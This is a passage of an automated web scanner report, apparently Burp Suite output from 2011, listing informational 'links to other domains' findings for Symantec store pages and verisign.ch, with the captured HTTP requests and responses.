HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 41218 Cache-Control: public, max-age=3577 Date: Fri, 09 Sep 2011 21:39:01 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Marketing - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-...[SNIP]... <div id="globalNavMainInner5"> <a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'> Store</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.61. http://www.symantec.com/store/products/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/store/products/index.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store The response contains the following links to other domains:http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849 http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /store/products/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 28649 Cache-Control: public, max-age=3523 Date: Fri, 09 Sep 2011 21:31:11 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Shop Products - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <...[SNIP]... <div style="float:right; text-align:right; padding-top:10px;"> Business Store | <a href="http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849"> Norton Store</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.62. http://www.symantec.com/store/resources/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/store/resources/index.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store The response contains the following links to other domains:http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /store/resources/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 27682 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:31:12 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Shopping Resources - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.63. http://www.symantec.com/store/services/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/store/services/index.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/store/services/index.jsp?inid=us_pagenotfound_smb_store The response contains the following links to other domains:http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /store/services/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 25519 Cache-Control: public, max-age=3530 Date: Fri, 09 Sep 2011 21:31:13 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Services - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta ...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.64. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/?tid=header-logo The response contains the following links to other domains:http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css http://cdn.verisign.com/authweb/en_ch/assets/home/images/verisign_inc_promo_home.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/home/css/home.css http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211 http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://ch.norton.com/ http://smallbusiness.norton.com/ http://verisign.com/partnersupport/worldwide/partnersupport.html http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <![endif]--> <link href="http://cdn.verisign.com/authweb/global/assets/home/css/home.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <![endif]--> <link rel='stylesheet' href='http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css' /> </head>...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... <li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... <li><a href='//www.verisign.com/latinamerica/esp/'> 